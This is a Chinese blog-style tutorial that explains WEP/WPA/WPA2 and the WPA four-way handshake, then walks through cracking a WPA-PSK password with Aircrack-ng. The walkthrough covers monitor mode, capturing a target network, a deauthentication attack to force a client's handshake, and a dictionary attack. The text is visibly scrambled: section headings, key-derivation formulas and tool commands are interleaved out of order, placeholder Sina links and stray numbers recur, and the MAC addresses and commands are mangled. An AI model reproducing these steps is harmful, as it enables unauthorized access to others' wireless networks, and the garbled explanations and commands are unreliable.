声明:本文仅供学习交流使用!
wifi 标准以及相应标准的特征汇总表
http://www.Sina.com/http://www.Sina.com /
最古老的无线加密方案容易被算法的缺陷解密。 数据包获取数据流中明文传输的IV,通过统计学方法在IV上获得密钥。
无线安全技术
WAP使用临时密钥集成协议(TKIP )实现WLAN的访问控制、密钥管理和数据加密,而无需升级硬件,从而提高WEP的安全性WPA加密算法有两个版本。 http://www.Sina.com/http://www.Sina.com /
1) WEP(Wired Equivalent Privacy有线对等保密)
802.1x EAP、预共享密钥:身份验证算法
TKIP、AES :数据传输加密算法
MIC、CCMP :数据完整性检查算法
802.1x EAP (在工业级、安全要求高的地方使用。 需要认证服务器(EAP扩展认证协议是一种体系结构,而不是具体算法。 常见的有LEAP、MD5、TTLS、TLS、PEAP、SRP、SIM、AKA中的TLS和TTLS为双向认证模式。 这种认证方式不怕网络劫持和词典攻击。
预共享密钥(家用,用于安全要求低的地方。 不需要服务器)。 容易被词典攻击
http://www.Sina.com/http://www.Sina.com /
WPA握手基于802.1X协议,使用eapol key进行封装传输。2) WPA
使用SSID和passphares作为条目,通过散列算法生成PSK。 在WPA-PSK上为a) WPA = 802.1x + EAP + TKIP + MIC = Pre-shared Key + TKIP + MIC
b) WPA2 = 802.1x + EAP + AES + CCMP = Pre-shared Key + AES + CCMP
AP广播SSID,AP_MAC(aa;
站端使用接收到的SSID,AP_MAC和passphares使用相同的算法生成PSK。
注:
STATION向AP发送随机数SNonce,station_MAC(sa );
AP端接收SNonce、station_MAC(sa )生成随机数ANonce,用PMK、AP_MAC ) aa、station_MAC(sa )、SNonce、ANonce生成以下sha1_
WPA-PSK
AP将上面生成的ANonce发送到站
站端使用与ANonce的接收和以前生成PMK、SNonce、AP_MAC(aa )、station_MAC ) sa的相同的算法生成PTK。 提取该PTK的前16个字节构成MIC KEY,使用以下算法生成MIC KEY值,使用该MIC KEY和802.1X数据帧使用以下算法生成MIC值1) WPA的四次握手过程
a) AP初始化:
站发送802.1X数据帧,MIC发送AP; 站端用上面准备的802.1X数据帧最后填充MIC值和2字节的0 (十六进制),然后将此数据帧发送到AP。
AP端接收该数据帧并提取该MIC。 然后,用0 (十六进制)填充此数据帧的所有MIC部分。 此时,使用此802.1X数据帧,使用与上面的AP生成的mic密钥相同的算法输出mic’。 如果mic’等于STATION发来的mic。 那么第四次握手成功了。 不等待说明,AP和站的钥匙不同,握手失败。
PSK=PMK=pdkdf2_SHA1(passphrase, SSID, SSID length, 4096)
使用我们词典中的Passphrase SSID成为PMK,然后结合紧握的包中的STA_MAC、AP_MAC、ANONCE、SNONCE计算PTK,再加入原始消息数据,将MIC
b) 第一次握手:
环境: Kali Linux 2.0、USB无线网卡
工具: Aircrack-ng
33558 www.Sina.com/:将USB卡插入虚拟机,并将网卡置于侦听模式。 命令如下:
Airmon-ngstartra0(ra0是无线网卡名称) ) )。
如果c) 第二次握手虚拟机无法检测到无线网卡,则必须安装驱动程序。 教程链接: http://blog.csdn.net/swjtu 100/article/details/50543260
PTK=SHA1_PRF(PMK, Len(PMK), “Pairwise key expansion”, MIN(AA, SA) || Max(AA, SA) || Min(ANonce, SNonce) || Max(ANonce, SNonce)):抓取数据包查看所在地区无线网络的状态,选择要解密的网络,命令如下:
airodump-ng ra0
d) 第三次握手::抓住目标网络握力包,命令:
airodump-ng-C1BSS IDEC :1733602 f : fa : f 0: ca-w/root/desktop/ra0
参数说明:-c :监听通道-bssid目标AP网络mac值-w :存储监听事件的文件名
33558 www.Sina.com/:重新打开terminal窗口,断开并重新连接使用DEAUTH攻击连接的客户端,创建握力包。 (注意:要握住并解密包,需要合法的客户端)命令包括:
aireplay-ng-010-AEC :1733602 f : fa : f 03360 ca-CDC : ee :0633601 f : bb : afra 0
参数说明:- 0 deauth攻击10 :进行10次攻击-a:AP的MAC地址-c :连接到该AP的客户端MAC地址
握住包后会显示红框内的信息
MIC = HMAC_MD5(MIC Key,16,802.1X data):通过掌握4次手册和词典(metasploit附带的词典)来解密密码,命令如下。
aircrack-ng-a2-bec :1733602 f : fa : f 03360 ca-w/usr/share/metasploit-framework/data/John /
word lists/password.lst/root/desktop/- 01.cap
参数说明:-a2 WPA方法手握包-w :词典路径-01.cap :解读步骤4中抓取的手握包文件名
解读成功!
参考:
3358 www.freebuf.com/articles/wireless/58342.html
3358 blog.csdn.net/Ivan _/article/details/39205371
3358 null-byte.wonder how to.com/how-to/wi-fi-hacking /
3358 lewiscomputerhowto.blogspot.in/2014/06/how-to-hack-wpa wpa2- wi-fi-with-kali.html